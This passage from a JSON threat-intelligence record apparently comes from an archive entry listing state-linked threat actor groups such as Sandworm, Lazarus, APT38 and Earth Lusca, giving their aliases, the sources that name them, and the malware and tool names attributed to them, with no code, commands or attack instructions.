			"source_name": "ETDA:Energetic Bear",
			"tools": [
				"Backdoor.Oldrea",
				"CRASHOVERRIDE",
				"Commix",
				"CrackMapExec",
				"CrashOverride",
				"Dirsearch",
				"Dorshel",
				"Fertger",
				"Fuerboos",
				"Goodor",
				"Havex",
				"Havex RAT",
				"Hello EK",
				"Heriplor",
				"Impacket",
				"Industroyer",
				"Karagany",
				"Karagny",
				"LightsOut 2.0",
				"LightsOut EK",
				"Listrix",
				"Oldrea",
				"PEACEPIPE",
				"PHPMailer",
				"PsExec",
				"SMBTrap",
				"Subbrute",
				"Sublist3r",
				"Sysmain",
				"Trojan.Karagany",
				"WSO",
				"Webshell by Orb",
				"Win32/Industroyer",
				"Wpscan",
				"nmap",
				"sqlmap",
				"xFrost"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa",
			"created_at": "2022-10-25T16:47:55.919702Z",
			"updated_at": "2026-04-10T02:00:03.618194Z",
			"deleted_at": null,
			"main_name": "IRON VIKING",
			"aliases": [
				"APT44 ",
				"ATK14 ",
				"BlackEnergy Group",
				"Blue Echidna ",
				"CTG-7263 ",
				"ELECTRUM ",
				"FROZENBARENTS ",
				"Hades/OlympicDestroyer ",
				"IRIDIUM ",
				"Qudedagh ",
				"Sandworm Team ",
				"Seashell Blizzard ",
				"TEMP.Noble ",
				"Telebots ",
				"Voodoo Bear "
			],
			"source_name": "Secureworks:IRON VIKING",
			"tools": [
				"BadRabbit",
				"BlackEnergy",
				"GCat",
				"NotPetya",
				"PSCrypt",
				"TeleBot",
				"TeleDoor",
				"xData"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a2b92056-9378-4749-926b-7e10c4500dac",
			"created_at": "2023-01-06T13:46:38.430595Z",
			"updated_at": "2026-04-10T02:00:02.971571Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Operation DarkSeoul",
				"Bureau 121",
				"Group 77",
				"APT38",
				"NICKEL GLADSTONE",
				"G0082",
				"COPERNICIUM",
				"Moonstone Sleet",
				"Operation GhostSecret",
				"APT 38",
				"Appleworm",
				"Unit 121",
				"ATK3",
				"G0032",
				"ATK117",
				"NewRomanic Cyber Army Team",
				"Nickel Academy",
				"Sapphire Sleet",
				"Lazarus group",
				"Hastati Group",
				"Subgroup: Bluenoroff",
				"Operation Troy",
				"Black Artemis",
				"Dark Seoul",
				"Andariel",
				"Labyrinth Chollima",
				"Operation AppleJeus",
				"COVELLITE",
				"Citrine Sleet",
				"DEV-0139",
				"DEV-1222",
				"Hidden Cobra",
				"Bluenoroff",
				"Stardust Chollima",
				"Whois Hacking Team",
				"Diamond Sleet",
				"TA404",
				"BeagleBoyz",
				"APT-C-26"
			],
			"source_name": "MISPGALAXY:Lazarus Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "f426f0a0-faef-4c0e-bcf8-88974116c9d0",
			"created_at": "2022-10-25T15:50:23.240383Z",
			"updated_at": "2026-04-10T02:00:05.299433Z",
			"deleted_at": null,
			"main_name": "APT38",
			"aliases": [
				"APT38",
				"NICKEL GLADSTONE",
				"BeagleBoyz",
				"Bluenoroff",
				"Stardust Chollima",
				"Sapphire Sleet",
				"COPERNICIUM"
			],
			"source_name": "MITRE:APT38",
			"tools": [
				"ECCENTRICBANDWAGON",
				"HOPLIGHT",
				"Mimikatz",
				"KillDisk",
				"DarkComet"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "1bdb91cf-f1a6-4bed-8cfa-c7ea1b635ebd",
			"created_at": "2022-10-25T16:07:23.766784Z",
			"updated_at": "2026-04-10T02:00:04.7432Z",
			"deleted_at": null,
			"main_name": "Bluenoroff",
			"aliases": [
				"APT 38",
				"ATK 117",
				"Alluring Pisces",
				"Black Alicanto",
				"Bluenoroff",
				"CTG-6459",
				"Copernicium",
				"G0082",
				"Nickel Gladstone",
				"Sapphire Sleet",
				"Selective Pisces",
				"Stardust Chollima",
				"T-APT-15",
				"TA444",
				"TAG-71",
				"TEMP.Hermit"
			],
			"source_name": "ETDA:Bluenoroff",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6",
			"created_at": "2022-10-25T15:50:23.339976Z",
			"updated_at": "2026-04-10T02:00:05.27483Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"Sandworm Team",
				"ELECTRUM",
				"Telebots",
				"IRON VIKING",
				"BlackEnergy (Group)",
				"Quedagh",
				"Voodoo Bear",
				"IRIDIUM",
				"Seashell Blizzard",
				"FROZENBARENTS",
				"APT44"
			],
			"source_name": "MITRE:Sandworm Team",
			"tools": [
				"Bad Rabbit",
				"Mimikatz",
				"Exaramel for Linux",
				"Exaramel for Windows",
				"GreyEnergy",
				"PsExec",
				"Prestige",
				"P.A.S. Webshell",
				"AcidPour",
				"VPNFilter",
				"Neo-reGeorg",
				"Cyclops Blink",
				"SDelete",
				"Kapeka",
				"AcidRain",
				"Industroyer",
				"Industroyer2",
				"BlackEnergy",
				"Cobalt Strike",
				"NotPetya",
				"KillDisk",
				"PoshC2",
				"Impacket",
				"Invoke-PSImage",
				"Olympic Destroyer"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434248,
	"ts_updated_at": 1775792228,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/781a1574a9f8bf669ba2f775f05296595e0033a3.pdf",
		"text": "https://archive.orkl.eu/781a1574a9f8bf669ba2f775f05296595e0033a3.txt",
		"img": "https://archive.orkl.eu/781a1574a9f8bf669ba2f775f05296595e0033a3.jpg"
	}
}